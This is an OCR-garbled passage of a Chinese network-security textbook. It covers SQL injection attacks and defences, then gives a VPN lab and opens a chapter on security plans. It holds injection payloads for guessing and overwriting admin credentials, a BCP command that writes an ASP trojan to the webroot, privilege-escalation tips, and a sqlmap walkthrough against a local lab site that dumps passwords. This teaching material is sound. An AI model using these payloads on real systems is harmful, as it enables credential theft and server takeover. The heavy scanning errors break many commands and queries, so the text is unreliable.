之 间 , 当 mm 二 1,2,3,… 时 分 别 猜测 第 1,2,3,… 位 的 值 ; n 的 值 是 1~9、a~z、A~Z 的 ASCII 
值 ,也 就 是 1 一 128 之 间 的 任意 值 ; admin 为 系统 用 户 账 号 表 的 名 称 ), 若 n 为 某 一 值 i 且 
abc. asp 运行 正常 时 , 则 i 对 应 ASCII 码 就 是 用 户 名 某 一 位 值 。 如 : 当 输 入 HTTP: //xxx. 
XXxx. Xxx/abc. asp? p 一 YY and (sel...ascii(substring(username,3,1)) from TestDB. dbo. 
admin) 王 80 时 abc. asp 运行 正常 , 则 用 户 名 的 第 三 位 为 POP 的 ASCII 为 80) 。 

输入 HTTP: //xxx. xxx. xxx/abc. asp? p 一 YY and (sel...ascii(substring(username, 
9,1)) from TestDB. dbo. admin) 一 33 时 abc. asp 运行 正常 , 则 用 户 名 的 第 9 位 为 ! (! 的 
ASCII 为 33); 猜 到 第 一 个 用 户 名 及 密码 后 , 同 理 , 可 以 猜 出 其 他 所 有 用 户 名 与 密码 。 

注意 ”有 时 得 到 的 密码 可 能 是 经 MD5 等 方式 加 密 后 的 信息 ,还 需要 用 专用 工具 进行 
脱 密 ; 或 者 先 修改 其 密码 ,使 用 完 后 再 改 回 来 。 

。 猜 用户 名 。 


HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select top 1...o.admin where username> 1) 


flag 是 admin 表 中 的 一 个 字段 ,username 是 用 户 名 字段 ,此 时 abc. asp 工作 异常 ,但 能 
得 到 Username 的 值 。 用 同样 的 方法 ,可 以 得 到 第 二 个 用 户 名 、 第 三 个 用 户 等 等 ,直到 表 中 
的 所 有 用 户 名 。 

。 猜 用 户 密码 。 


HTTP: //xxx. xxx. xxx/abc. asp?p = YY and (select top 1&nb ... B. dbo. admin where pwd > 1) 


flag 是 admin 表 中 的 一 个 字段 ,pwd 是 密码 字段 ,此 时 abc. asp 工作 异常 ,但 能 得 到 
pwd 的 值 。 用 同样 的 方法 ,可 以 得 到 第 二 用 户 名 的 密码 .第 三 个 用 户 的 密码 等 等 ,直到 表 中 
的 所 有 用 户 的 密码 。 

密码 有 时 是 经 MD5 加 密 的 ,可 以 改 密码 。 

HTTP: / /xoxcx. xxx. xxx/abc. asp?p = YY; 

update TestDB. dbo. admin set pwd = '...where?username = ‘www'; 

1 的 MD5 值 为 : AAABBBCCCDDDEEEF, 即 把 密码 改 成 1; www 为 已 知 的 用 户 名 。 
用 同样 的 方法 当然 可 把 密码 改 为 原来 的 值 。 

第 二 种 方法 是 利用 将 表 内 容 导 出 为 文件 的 功能 。SQL 有 BCP 命令 , 它 可 以 把 表 的 内 
容 导 成 文本 文件 并 放 到 指定 位 置 。 利 用 这 项 功能 ,可 以 先 建 一 张 临时 表 , 然 后 在 表 中 一 行 一 
行 地 输入 一 个 ASP 木马 ,然后 用 BCP 命令 导出 形成 ASP 文件 。 

命令 行 格式 如 下 : 
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bcp" select * from text. . foo" queryout c: \inetpub\wwwroot\runcommand. asp-c -S localhost-U sa-P 
foobar ('S' 参 数 为 执行 查询 的 服务 器 , "U' 参 数 为 用 户 名 , 'P' 参 数 为 密码 ,最 终 上 传 了 一 个 runcommand. 
asp 的 木马 ) 


6. 得 到 管理 员 权 限 

ASP 木马 只 有 USER 权限 ,要 想 获 取 对 系统 的 完全 控制 ,还 要 有 系统 的 管理 员 权 限 。 怎 
么 办 ? 提升 权限 的 方法 有 很 多 种 : 上 传 木马 ,修改 开机 自动 运行 的 . ini 文件 ; 复制 CMD. exe 
到 Scripts, 人 为 制造 UNICODE 漏洞 ; 下 载 SAM 文件 ,破解 并 获取 OS 的 所 有 用 户 名 和 密码 。 


5.4.3 SQL 注入 攻击 预防 


1. 严格 的 区 分 普通 用 户 与 系统 管理 员 的 权限 

如 果 一 个 普通 用 户 在 使 用 查询 语句 中 嵌入 另 一 个 Drop Table 语句 ,那么 是 否 允 许 执行 
呢 ? 由 于 Drop 语句 关系 到 数据 库 的 基本 对 象 , 故 要 操作 这 个 语句 必须 有 相关 的 权限 。 在 
权限 设计 中 ,对 于 终端 用 户 , 即 应 用 软件 的 使 用 者 ,没有 必要 赋予 他 们 数据 库 对 象 的 建立 、 删 
除 等 权限 。 那 么 即使 他 们 使 用 的 SQL 语句 中 带 有 插入 式 的 恶意 代码 ,由 于 其 用 户 权限 的 限 
制 ,这 些 代 码 也 将 无 法 被 执行 。 故 应 用 程序 在 设计 的 时 候 , 最 好 把 系统 管理 员 用 户 与 普通 用 
户 区 分 开 来 。 如 此 可 以 最 大 限度 地 减少 注入 式 攻击 对 数据 库 带 来 的 危害 。 

2. 强迫 使 用 参数 化 语句 

在 编写 SQL 语句 的 时 候 , 如 果 用 户 输入 的 变量 不 是 直接 嵌入 到 SQL 语句 ,而 是 通过 参 
数 来 传递 这 个 变量 的 话 ,那么 就 可 以 有 效 地 防止 SQL 注入 攻击 。 也 就 是 说 ,用 户 的 输入 绝 
对 不 能 够 直接 被 嵌入 到 SQL 语句 中 。 与 此 相反 ,对 用 户 输入 的 内 容 必 须 进行 过 滤 ,或 者 使 用 
参数 化 的 语句 来 传递 用 户 输入 的 变量 。 参 数 化 的 语句 使 用 参数 而 不 是 将 用 户 输 入 变量 嵌入 到 
SQL 语句 中 。 采 用 这 种 措施 ,可 以 杜绝 大 部 分 的 SQL 注入 攻击 。 不 过 可 惜 的 是 ,现在 支持 参 
数 化 语句 的 数据 库 引 擎 并 不 多 。 数 据 库 工程 师 在 开发 产品 的 时 候 要 尽量 采用 参数 化 语句 。 

3. 加 强 对 用 户 输入 的 验证 

总 体 来 说 ,防止 SQL 注入 攻击 可 以 采用 两 种 方法 ,一 是 加 强 对 用 户 输 入 内 容 的 检查 与 
验证 ; 二 是 强迫 使 用 参数 化 语句 来 传递 用 户 输入 的 内 容 。 在 SQL Server 数据 库 中 ,有 比较 
多 的 用 户 输入 内 容 验 证 工具 ,可 以 帮助 管理 员 来 对 付 SQL 注入 攻击 。 测 试 字符 串 变 量 的 内 
容 , 只 接受 所 需 的 值 。 拒 绝 包 含 二 进 制 数据 、 转 义 序列 和 注释 字符 的 输入 内 容 。 这 些 都 有 助 
于 防止 脚本 注入 ,防止 某 些 缓冲 区 溢出 攻击 。 测 试用 户 输入 内 容 的 大 小 和 数据 类 型 ,强制 执 
行 适 当 的 限制 与 转换 。 这 些 则 有 助 于 防止 有 意 造 成 的 缓冲 区 溢出 ,对 于 防止 注入 式 攻击 有 
比较 明显 的 效果 。 

4. 使 用 SQL Server 自 带 的 安全 参数 

为 了 减少 注入 式 攻 击 对 SQL Server 数据 库 的 不 良 影响 ,SQL Server 数据 库 专门 设计 
了 相对 安全 的 SQL 参数 。 在 数据 库 设计 过 程 中 ,工程 师 要 尽量 采用 这 些 参数 来 杜绝 恶意 的 
SQL 注入 攻击 。 

5. 使 用 专业 的 漏洞 扫描 工具 

必要 的 情况 下 ,使 用 专业 的 漏洞 扫描 工具 ,可 以 帮助 管理 员 来 寻找 可 能 被 SQL 注入 攻 
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击 的 点 。 不 过 漏洞 扫描 工具 只 能 发 现 攻击 点 ,而 不 能 够 主动 起 到 防御 SQL 注入 攻击 的 作 
用 。 所 以 凭借 专业 的 工具 ,可 以 帮助 管理 员 发 现 SQL 注入 攻击 式 漏洞 ,并 提醒 管理 员 采 取 
积极 的 措施 来 预防 SQL 注入 攻击 。 如 果 攻 击 者 能 够 发 现 的 SQL 注入 攻击 漏洞 数据 库 管理 
员 都 发 现 了 并 采取 了 积极 的 措施 ,那么 攻击 者 也 就 无 从 下 手 了 。 

6. 使 用 PreparedStatement 语句 

对 于 Java 数据 库 连 接 JDBC 而 言 ,SQL 注入 攻击 只 对 Statement 有 效 , 对 PreparedStatement 
是 无 效 的 ,这 是 因为 PreparedStatement 不 允许 在 不 同 的 插 和 人 时间 改变 查询 的 逻辑 结构 。 

如 验证 用 户 是 否 存在 的 SQL 语句 为 : 

用 户 名 'and?pswd = ' 密 码 ; 

如 果 在 用 户 名 字段 中 输入 :“'orl 二 1” 或 是 在 密码 字段 中 输入 :“'orl1 二 1;”, 则 将 绕 过 验 
证 ,但 这 种 手段 只 对 Statement 有 效 , 对 PreparedStatement 无 效 。 相 对 Statement 而 言 ， 
PreparedStatement 有 以 下 优点 : 防 注 入 攻击 ; 多 次 运行 速度 快 ; 防止 数据 库 缓冲 区 溢出 
代码 的 可 读 性 .可 维护 性 好 。 这 4 点 使 得 PreparedStatement 成 为 访问 数据 库 的 语句 对 象 的 
首选 ,缺点 是 灵活 性 不 够 好 ,在 有 些 场合 还 是 必须 使 用 Statement。 


5.4.4 SQL 注入 攻击 实例 


以 JavaEE 作为 开发 语言 ,采用 MVC 编程 开发 模式 搭建 了 一 个 简单 个 人 主页 网 站 作为 
实验 网 站 ,主要 包含 个 人 主页 展示 、 留 言 板 留言 .管理 员 后 台 登 录 以 及 后 台 留 言 管理 等 功能 ， 
其 中 留言 板 留言 .后台 登录 和 后 台 留 言 管理 需要 连接 数据 库 进 行 操作 。 

(1) 进入 个 人 主页 : http: //localhost: 8080/SQLInjection/index. jsp ,在 浏览 网 页 过 程 
中 发 现 网 址 : http: //localhost: 8080/SQLInjection/login. jsp, 这 是 一 个 管理 员 后 台 登 录 页 
面 ,如 图 5-16 所 示 。 


© localhost:8080/SQLInjection/loginjsp 
li Docs 6 百度 网 盘 由 01- 在 线 挑战 详细 攻 曙 四 头条 号 、 昂 Root_Yang 网 易 博客 


欢迎 进入 管理 吴 登 录 界面 
用 户 名 : 
密码 : 
EIE 


图 5-16 管理 员 后 台 登 录 界面 


发 现 网 址 : http: //localhost: 8080/SQLInjection/searchAbout?id 二 1 存在 GET 请 求 
的 ID 参数 ,如 图 5-17 所 示 ,尝试 进行 SQL 注入 攻击 测试 ,以 便 能 够 找到 管理 员 密 码 。 

如 图 5-18 所 示 ,尝试 id 一 888 or 1 一 1 ,发 现在 这 里 列 出 了 Web 更 新 的 全 部 记录 ,在 这 
里 可 以 断定 Web 程序 并 未 对 参数 进行 有 效 过 滤 。 

如 图 5-19 和 图 5-20 所 示 , 接 下 来 尝试 SQL 测试 万 能 语句 : and 1 二 1,andl1 一 2。 

测试 结果 令 人 高 兴 : id 二 1 and 1 二 1 页 面 显 示 正 常 ,而 id 二 1 and 1 一 2 显示 “ 查 无 结 
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© localhost:8080/SQLInjection/searchAbout?id=1 


Docs ”人 百度 网 盘 由 01- 在 线 挑战 详细 攻 展 ”四 头 冬 号 ” 易 Root Yang 网 易 博客 


关于 软件 









































WEB 开 发 更 新 日 期 记录 : 
更 新 人 员 : 更 新 日 期 : 
Root Yang 2017-05-01 

















图 5-17 SQL 注入 攻击 测试 1 


| D| localhost:8080/SQLInjection/searchAbout?id=888 or 1=1 


Docs 人 百度 网 盘 ”器 01- 在 线 挑 吉 详细 攻 曙 ”图 头条 号 。 昂 Root_Yang 网 易 博客 












































关于 软件 

WEB 开 发 更 新 日 期 记录 : 
更 新 人 员 : 更 新 日 期 : 
Root Yang 2017-05-01 

root 2017-05-02 

root1 2017-05-03 

root2 2017-05-04 

root3 2017-05-05 









































图 $-18 SQL 注入 攻击 测试 2 


| DI localhost:8080/SQLInjection/searchAbout?id=1 and 1=1 


Docs 全 百 度 网 盘 由 01- 在 线 挑战 详细 攻 曙 ”图 头条 号 、 易 Root Yang 网 易 博 客 


WEB 开 发 更 新 日 期 记录 : 
更 新 人 员 : 更 新 日 期 : 
Root Yang 2017-05-01 


















































图 5-19 SQL 注入 攻击 测试 3 


| D| localhost8080/sSQLInjection/searchAbout?id=1 and 1=2 


Docs 信 百 度 网 盘 由 01- 在 线 挑战 详细 攻 诊 图 头条 号 ” 易 Root Yar 
查 无 结果 


图 5-20 SQL 注入 攻击 测试 4 


果 ”, 这 就 明确 说 明 肯 定 存 在 SQL 注入 攻击 漏洞 。 

(2) SQLmap 注入 测试 。 在 CMD 命令 行 模式 进入 Python2.7 目录 ,输入 : python2. 
exe sqlmap/sqlmap. py-u http: //localhost: 8080/SQLInjection/searchAbout? id 一 1 ,进行 
自动 化 测试 。 

测试 结果 如 图 5-21 所 示 .结果 表明 确实 存在 注入 漏洞 .注入 参数 id 为 GET 注入 ,注入 
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类 型 有 两 种 : boolean-based blind( 基 于 布尔 盲 注 ) 和 ANDVOR time-based blind( 基 于 时 间 
盲 注 ); Web 应 用 程序 技术 为 JSP; 数据 库 类 型 为 : MySQL=5.0. 12。 


sqlmap resumed the following injection point(s) from stored session: 
Parameter:id (GET) 
Type: boolean-based blind 
Title: AND boolean-based blind-WHERE or HAVING clause 
Payload: id=1 AND 9752=9752 
Type: AND/OR time-based blind 
Title: MySQL >= 5.0.12 AND time-based blind 
Payload: id=1 AND SLEEP(5) 
搜狗 拼音 输入 法 全 : ry 
Title: Generic UNION query (NULL) -2 columns 
Payload: id=-8987 UNION ALL SELECT 
CONCAT (0x717a7a6a71,0x7a46457754736b556d6d4356676b4c794 
a65536d69546d46626c686b4745664457655655794c695a,0x7170627a71) ,NULL 一 uTQW 
[22:34:12] [INFO] the back-end DBMS is MySQL 
Web application technology: JSP 
Back-end DBMS : MySQL >=5.0.12 
[22:34:12] [INFO] fetched data logged to text files under 
“C:\Users\Root Yang\sqlmap\output\localhost” 








图 5-21 SQLmap 注入 测试 
(3) 猜 解 所 有 数据 库 名 称 。 输 入 命令 : python2. 
[22:51:50] [INFO] resumed: 


exe sqlmap/sqlmap. py-u http: //localhost: 8080/ sqlinjection available database [6] 
SQLInjection/ searchAbout? id==1--dbs, 结 果 如 图 5-22 | [1 contacts 





[#] db_book 
所 示 ,发 现存 在 多 个 数据 库 。 [和 db_user ， 
(4) 查看 当前 Web 程序 所 使 用 的 数据 库 ,输入 | [3 me 





命令 : python2. exe sqlmap/sqlmap. py-u http: // | 鸭 salinjection 





localhost: 8080/SQLInjection/searchAbout? id = 图 5-22” 猜 解 所 有 数据 库 名 称 
1--current-db, 结 果 如 图 5-23 所 示 , 显 示 当 前 数据 库 


是 sqlinjection。 





[22:58:07] the back-end DBMS is MySQL 

web application technology: JSP 

back-end DBMS: MySQL>=5. 0. 12 

[22:58:07] [INFO] fetching current database 
current database: 'sqlinjection' 











图 5-23 猜 解 当前 数据 库 名称 


(5) 查看 当前 数据 库 用 户 名 和 密码 ,结果 如 图 5-24 所 示 , 显 示 当 前 数据 库 名 是 root , 密 
码 为 toor。 





[23:01:10] [INF0] cracked password 'toor' for user 'root' 
Database management system users password hashes: 
[jroot[1]: 

password hash: *9CFBBC772F3F6C106020035386DA5BBBF1249A11 
clear-text password: toor 

[#] shutting down at 23:01:22 


图 5-24 当前 数据 库 用 户 名 和 密码 
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(6) 列 出 当前 数据 库 中 的 表 , 输 入 命令 : python2. exe sqlmap/sqlmap. py-u http: // 
localhost: 8080/SQLInjection/searchAbout? id = 1-D sqlinjection- -tables, 结果 如 
图 5-25 所 示 , 显 示 有 db_admin、db_about、db_user 共 3 个 表 。 

(7) 猜 解数 据 表 中 字段 。 选 择 db_about 这 个 表 , 输 入 : python2. exe sqlmap/sqlmap. 
py-u http: //localhost: 8080/SQLInjection/searchAbout? id = 1-D sqlinjection-T db_ 
about--columns, 列 举 出 所 有 字段 ,结果 如 图 5-26 所 示 , 显 示 有 id、name、data 共 3 个 字段 。 

















[23:06:42] [INFO] retrieved: "data", "date" 
Database: sqlinjection 
Table: db_about 
[3 colums] 
Database: sqlinjection ee ee 十 
[3 tables] Column Type 
+- 一 -一 -一 -一 -一 + +- 一 -一 -一 -一 +- 一 -一 -一 -一 - + 
| db_about | id varchar(5) 
| db_admin | name varchar (40) 
| db_user data date 
+- 一 -一 -一 -一 -一 + +- 一 -一 -一 -一 +- 一 -一 -一 -一 - + 
图 5-25 当前 数据 库 中 的 表 图 5-26 ” 猜 解数 据 表 中 字段 


(8) 猜 解 字段 内 容 , 输 入 : python2. exe sqlmap/sqlmap. py -u http://localhost: 8080/ 
SQLInjection/searchAbout? id=1 -D sqlinjection -T db_about -C name,data --dump , 列 出 
字段 (name,data) 的 具体 内 容 , 结 果 如 图 5-27 所 示 。 

因为 我 们 主要 的 目的 是 要 进入 后 台 管 理 界面 ,所 以 必须 找到 管理 员 的 用 户 名 和 密码 ,所 
以 我 们 猜 解 一 下 db_user 和 db_admin 的 字段 和 字段 内 容 , 如 图 5-28 一 图 5-31 所 示 。 









































Database: sqlinjection 

Table: db_about [5 entries] Database: sqlinjection 

二- 一 一 一 一 一 一 一 一 + 一 一 一 一 一 一 一 一 一 一 一 十 Table:db_user [4 columns] 

| name data We ee = 

下 Colum | Type 

| Root _Yang | 2017-05-01 J i 和 

| root 2017-05-02 id | int(3) | 

| rootl 2017-05-03 message | text | 

| root2 2017-05-04 password | varchar(12) | 

| root3 2017-05-05 username | varchar(l2) | 

二 一 4 一 -一 -一 ~ 一 一 二 -一 -一 -一 -一 + 
图 5-27 ” 猜 解 字段 内 容 图 5-28 db_user 字段 





[23:12:10][INF0] analyzing table dump for possible password hashes 
Database: sqlinjection 








Table: db_user [8 entries] 
二 一 
| username password message | 
ee Ne -二 
|1idakang dakang888 | 政府 工作 报告 


| zhangdahua <blank> | 我 是 张大 华 ， 我 有 几 句 话 要 对 你 说 ! 
|houliangping | liangping | 我 是 侯 亮 平 ， 我 来 协助 您 的 调查 。 


| 
| 
| 
+- 一 -一 -一 -一 - + 一 -一 -一 +- 一 -一 - -一 -一 + 

















5-29 ”db_user 字段 内 容 
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Database: sqlinjection Database: sqlinjection 
Table: db_admin [2 columns] Table: db_admin [2 entries] 
+ 一 -一 -一 +- 一 -一 -一 -一 - + 站 = +- 一 -一 -一 -一 -- + 
Column | Type username password 
+- 一 -一 -一 +- 一 -一 -一 -一 - + 年 
username | varchar(10) admin admin 
password | varchar(10) Toot toor 
和 全 一 + 了 +- 一 -一 -一 -一 -- + 
图 5-30 db_admin 字段 图 5-31 db_admin 字段 内 容 


可 以 发 现 : db_user 是 留言 记录 表 , 存 放 着 留言 者 的 用 户 名 、 密 码 和 留言 信息 ; db_ 
admin 推测 应 该 是 管理 员 用 户 名 /密码 表 。 

(9) 结果 验证 。 已 查 到 db_admin 表 中 字段 内 容 了 , 接 欢迎 进入 管理 员 登 录 界 面 
下 来 就 在 管理 员 登 录 页 面 输入 用 户 名 (admin) 和 密码 用 户 各: admin 
(admin) 进 行 验 证 。 密码 | 

如 图 5-32 所 示 ,现在 可 以 顺利 进入 到 后 台 留 言 管理 界面 
了 ,说 明 db_admin 确实 是 管理 员 用 户 名 /密码 表 。 登 录 后 可 
以 看 到 所 有 用 户 的 留言 信息 ,也 可 以 进行 后 台 留 言 删 除 。 





图 5-32 管理 员 登 录 界面 


习 题 5 


5.1 JIP 安全 
1. IPSec 协议 集 提供 的 安全 服务 有 ( yt ) ) 天 
2. IPSec 体系 结构 组 成 部 分 有 ( jt ys yt js ya % Ws 
( ye 
. 简 述 安全 隧道 的 建立 。 
IPSec 有 两 种 工作 方式 :( ) 和 ( Xs 
.2 VPN 技术 
. 什么 是 虚拟 专用 网 ? 
.VPN 的 关键 技术 有 ( se at jt We 
. VPN 的 3 种 解决 方案 分 别 为 ( yi ON )s 
. 简 述 VPN 隧道 技术 。 
. L2TP 的 建立 过 程 有 哪些 ? 
.3 Web 安全 
. 什么 是 Web 技术 ? 
. 什么 是 主动 攻击 ? 什么 是 被 动 攻击 ? 
. 从 TCP/IP 协议 的 角度 可 以 将 实现 Web 安全 的 方法 分 成 ek 和 
( » 
4. SSL 提供 3 种 标准 服务 :( Dt jt Ys 
5. 简 述 SSL 协议 的 构成 。 


由 
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.4 SQL 注入 攻击 

. SQL 注入 攻击 是 ( 

. 如 何 判断 应 用 程序 是 否 存在 SQL 注入 攻击 漏洞 ? 

. 如何 根据 注入 参数 类 型 , 重 构 SQL 语句 的 原貌 ? 如 何 猜 解 表 名 .字段 名 .字段 内 容 ? 
.SQL 注入 的 攻击 原理 是 什么 ? 

. 简 述 SQL 注入 攻击 的 思路 。 





am om wm 


实验 5 VPN 单 辟 旁 挂 于 防火 墙 配置 


【实验 目的 】 
掌握 VPN 单 臂 旁 挂 于 防火 墙 时 各 设备 的 配置 方法 。 
【实验 内 容 】 


VPN 单 臂 旁 挂 于 防火 墙 方式 占用 物理 接口 少 , 且 不 改变 原 有 网 络 拓扑 结构 ,只 需 旁 挂 
在 路 由 器 或 者 防火 墙 上 即 可 。 

如 图 5-33 所 示 ,VPN 单 臂 旁 挂 于 防火 墙 上 ,为 远程 接 人 用 户 提供 SSL VPN 业务 。 远 
程 接 入 用 户 使 用 SSL VPN 业务 访问 企业 内 网 资源 时 ,企业 网 络 出 口 的 防火 墙 可 以 对 用 户 
的 内 网 访问 行为 进行 安全 策略 控制 和 内 容 安全 检查 。 


SVN 






GE1/0/2 ! 


10.1.1.2/24 7 终端 用 户 


人 一 -长 和 一 -年 可 一- < 
便携 机 Switch GEI0B 防火 墙 1.1.1/24 便 揣 机 
172.16.10.1/24 
所 -> 密 文 数据 
< -BP 明文 数据 


图 5-33 ”实验 拓扑 图 


1. 组 网 需求 
SVN( 一 种 型 号 的 VPN) 1 台 , 防 火 墙 1 台 , 三 层 交 换 机 1 台 , 便 携 机 2 台 。 
2. 实验 拓扑 图 


实际 操作 中 ,拓扑 图 中 的 Internet 可 以 用 一 台 三 层 交 换 机 或 路 由 器 替代 。 实 际 连 线 如 
图 5-34 所 示 , 用 网 线 连接 设备 的 GE1/0/2 到 防火 墙 或 者 路 由 器 上 (此 处 以 GE1/0/2 为 例 说 
明 , 也 可 以 根据 需要 使 用 其 他 接口 )。 用 网 线 连接 设备 的 MGMT 接口 (管理 口 ) 到 管理 PC。 
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VPN 端 口 模板 
MGMT GE1/0/1 GE1/0/3 GE1/0/5 
CONSOLE GE1/0/0 GE1/0/2 GE1/0/4 
(eR) 
a8 ri 7 
图 5-34 ”实验 连 线 图 

3. 实验 步骤 
SVN 和 防火 墙 的 配置 思路 如 下 : 
1) 配置 SVN 


(1) 配置 SVN 的 GE1/0/1 接口 IP 地 址 ,并 将 此 接口 加 入 安全 域 。 该 接口 的 IP 地 址 后 
续 会 作为 虚拟 网 关 的 IP 地 址 。 

(2) 打开 SVN 的 默认 安全 策略 ,允许 防火 墙 与 SVN 之 间 的 流量 通过 。 

(3) 配置 SVN 的 路 由 。 无 论 是 终端 用 户 访问 企业 内 网 的 流量 ,还 是 企业 内 网 服务 器 响 
应 终端 用 户 的 流量 ,SVN 都 会 统一 将 这 些 流 量 发 送 给 防火 墙 处 理 , 因 此 只 需要 在 SVN 上 配 
置 一 条 默认 路 由 即 可 ,路 由 的 下 一 跳 是 防火 墙 GE1/0/2 接口 的 IP 地 址 。 

2) 配置 防火 墙 

(1) 配置 接口 IP 地 址 和 安全 区 域 。 

(2) 配置 防火 墙 上 的 安全 策略 。 

在 防火 墙 上 要 配置 两 条 安全 策略 : 一 条 安全 策略 用 于 确保 网 络 互通 ; 另 一 条 用 于 DMZ 
和 Trust。 

域 间 策略 用 于 控制 SVN 和 服务 器 之 间 的 流量 。 

(3) 在 SVN 旁 挂 于 防火 墙 部 署 方案 中 ,防火墙 支持 对 SVN 与 内 网 服务 器 之 间 的 流量 
进行 安全 策略 控制 以 及 内 容 安全 检查 。 

(4) 在 防火 墙 上 配置 NAT Server 功能 ,将 SVN 的 私 网 虚拟 网 关 地 址 映射 成 公 网 地 
址 ,以 便 后 续 在 SVN 上 配置 的 虚拟 网 关 能 够 被 公 网 用 户 访问 。 

4. 操作 步骤 

1) 配置 SVN 

(1) 配置 接口 IP 地 址 和 安全 域 。 操 作 步 骤 : (请 读者 根据 实验 内 容 记录 ) 

(2) 打开 SVN 的 默认 安全 策略 。 操 作 步 又 : (请 读者 根据 实验 内 容 记录 ) 

(3) 配置 SVN 的 默认 路 由 。 操作 步 又 : (请 读者 根据 实验 内 容 记录 ) 

2) 配置 防火 墙 


目的 地 址 / 掩 码 0.0.0.0/0.0.0.0 
下 一 跳 10.1.1.2 


区 说 明 : 此 处 以 HUAWEI USG6000 系列 防火 墙 为 例 , 介 绍 NAT Server 功能 的 
配置 。 
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(1) 配置 接口 IP 地 址 和 安全 域 。 

按 参数 (安全 区 域 : Untrust; IP 地 址 : 1.1.1.1/24) 配 置 GE1/0/1。 

步 又: 〈 请 读者 根据 实验 内 容 记录 ) 

多 说 明 : 为 了 配置 完成 后 ,验证 网 络 的 连通 性 ,请 在 配置 接口 时 ,选中 * 启 用 访问 管理 ” 
中 的 Ping 服务 。 

参照 上 述 配置 步骤 ,参数 (安全 区 域 : DMZ; IP 地 址 : 1. 1. 1. 2/24) (安全 区 域 : Trust; 
IP 地 址 : 172. 16. 10. /24) 配 置 GE1/0/2、GE1/0/3 接口 IP 地 址 。 

(2) 配置 DMZ 和 Trust 的 域 间 安全 策略 ,用 于 控制 SVN 与 服务 器 之 间 的 流量 交互 。 

步骤 :〈 请 读者 根据 实验 内 容 记录 ) 

(3) 配置 NAT Server 功能 。 

步骤 :〈 请 读者 根据 实验 内 容 记录 ) 

5. 结果 验证 

请 读者 根据 实验 内 容 记录 。 

6. 配置 脚本 

请 读者 根据 实验 内 容 记录 。 


第 6 章 网 络 安全 方案 设计 与 评估 


本 章 学 习 要 求 

4 掌握 从 网 络 安全 角度 编写 网 络 安全 方案 的 方法 ,理解 网 络 安全 评估 的 目的 及 意义 ; 
4 掌握 网 络 安全 方案 框架 ,理解 网 络 安全 方案 设计 要 点 ; 

4 掌握 网 络 安全 方案 设计 内 容 , 理 解 网 络 安全 评估 服务 内 容 。 


6.1 网 络 安全 方案 设计 


网 络 安全 方案 就 像 一 张 施工 图 纸 ,图 纸 的 好 坏 直 接 影响 到 工程 质量 的 高 低 。 总 的 来 说 ， 
网 络 安 全 方案 涉及 的 内 容 比 较 多 、 比 较 广 ,比较 专业 和 实际 。 

对 于 从 事 网 络 安全 工作 的 人 来 说 ,对 网 络 必须 有 一 个 整体 、 动 态 的 安全 概念 。 总 的 来 
说 ,就 是 要 在 整个 项 目 中 ,有 一 种 总 体 把 握 的 能 力 ,不 能 只 关注 自己 熟悉 的 某 一 领域 ,而 对 其 
他 领域 毫 不 关心 ,甚至 不 理解 ,否则 就 写 不 出 一 份 好 的 安全 方案 。 因 为 写 出 来 的 方案 要 针对 
用 户 所 过 到 的 问题 ,运用 产品 和 技术 解决 问题 。 设 计 人 员 只 有 对 安全 技术 了 解 得 很 深 , 对 产 
品 了 解 得 比较 全 面 , 写 出 来 的 方案 才能 接近 用 户 的 需求 。 

一 份 好 的 网 络 安全 方案 ,不 仅仅 要 考虑 到 技术 ,还 要 考虑 到 策略 和 管理 。 技 术 是 关键 ， 
策略 是 核心 ,管理 是 保证 。 在 方案 中 ,始终 要 体现 出 这 3 方面 的 关系 。 

在 设计 网 络 安全 方案 时 ,一定 要 了 解 用 户 实际 网 络 系统 的 环境 ,对 当前 可 能 遇 到 的 安全 
风险 和 威胁 做 一 个 量化 和 评估 。 好 的 方案 是 一 个 安全 项 目 中 很 重要 的 部 分 ,是 项 目 实施 的 
基础 和 依据 。 

在 设计 方案 时 ,动态 安全 是 一 个 很 重要 的 概念 ,也 是 网 络 安全 方案 和 其 他 项 目 方案 的 最 
大 区 别 。 所 谓 动态 安全 ,就 是 随 着 环境 的 变化 和 时 间 的 推移 ,这 个 系统 的 安全 性 会 发 生变 
化 , 变 得 不 安全 ,所 以 在 设计 方案 时 ,不 仅 要 考虑 到 现在 的 情况 ,也 要 考虑 到 将 来 的 情况 ,用 
一 种 动态 的 方式 来 考虑 ,做 到 项 目的 实施 既 能 考虑 到 现在 的 情况 ,也 能 很 好 地 适应 以 后 网 络 
系统 的 升级 , 留 有 一 个 比较 好 的 升级 接口 。 

网 络 没有 绝对 的 安全 ,只 有 相对 的 安全 。 在 设计 网 络 安全 方案 时 ,必须 清楚 这 一 点 ,以 
一 种 客观 的 态度 来 写 , 既 不 夸大 也 不 缩小 , 写 得 实 实在 在 ,让 人 信服 接受 。 由 于 时 间 和 空间 
不 断 发 生 作用 ,安全 不 是 绝对 的 ,不 管 在 设计 还 是 在 实施 时 , 想 得 多 完善 ,做 得 多 严密 ,都 不 
能 达到 绝对 的 安全 。 所 以 在 方案 中 应 该 告诉 用 户 ,只 能 做 到 避免 风险 ,减少 风险 的 根源 , 降 
低 由 于 风险 所 带 来 的 危害 ,而 不 能 做 到 消灭 风险 。 

在 网 络 安全 中 ,动态 性 和 相对 性 非常 重要 ,可 以 从 系统 .人 和 管理 3 个 方面 来 理解 。 系 
统 是 基础 .认识 是 核心 .管理 是 保证 。 从 项 目 实施 上 来 讲 ,这 3 个 方面 是 项 目 质量 的 保证 。 
操作 系统 是 一 个 很 复杂 很 庞大 的 体系 ,在 设计 和 实施 时 ,考虑 安全 的 因素 可 能 比较 少 , 总 会 
存在 这 样 或 那样 的 人 为 错误 ,这 些 错误 的 直接 后 果 就 是 带 来 安全 方面 的 风险 。 而 且 总 有 一 
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些 黑 客 以 挖掘 系统 的 安全 漏洞 .入 侵 系 统 为 荣 。 从 这 个 方面 来 讲 ,系统 在 明 处 ,黑客 在 瞳 处 ， 
网 络 系统 遭受 攻击 的 情形 防不胜防 。 

在 一 个 项 目 中 ,人 总 是 核心 。 一 个 人 的 技术 水 平 . 思 想 行 为 和 心理 素质 等 都 会 影响 到 项 
目的 质量 。 比 如 项 目的 密码 要 复杂 ,要 采用 大 小 写 .数字 和 特殊 字符 等 的 组 合 ,但 如 果 在 实 
际 使 用 中 ,一 个 系统 管理 员 的 管理 账号 的 密码 使 用 的 是 自己 的 生日 ,这 样 的 系统 放 在 网 上 ， 
一 般 不 能 坚持 得 太 久 。 管 理 是 关键 ,系统 的 安全 配置 .动态 跟踪 、 人 的 有 效 管理 都 要 通过 管 
理 来 约束 和 保证 。 

评价 网 络 安 全 方案 的 质量 

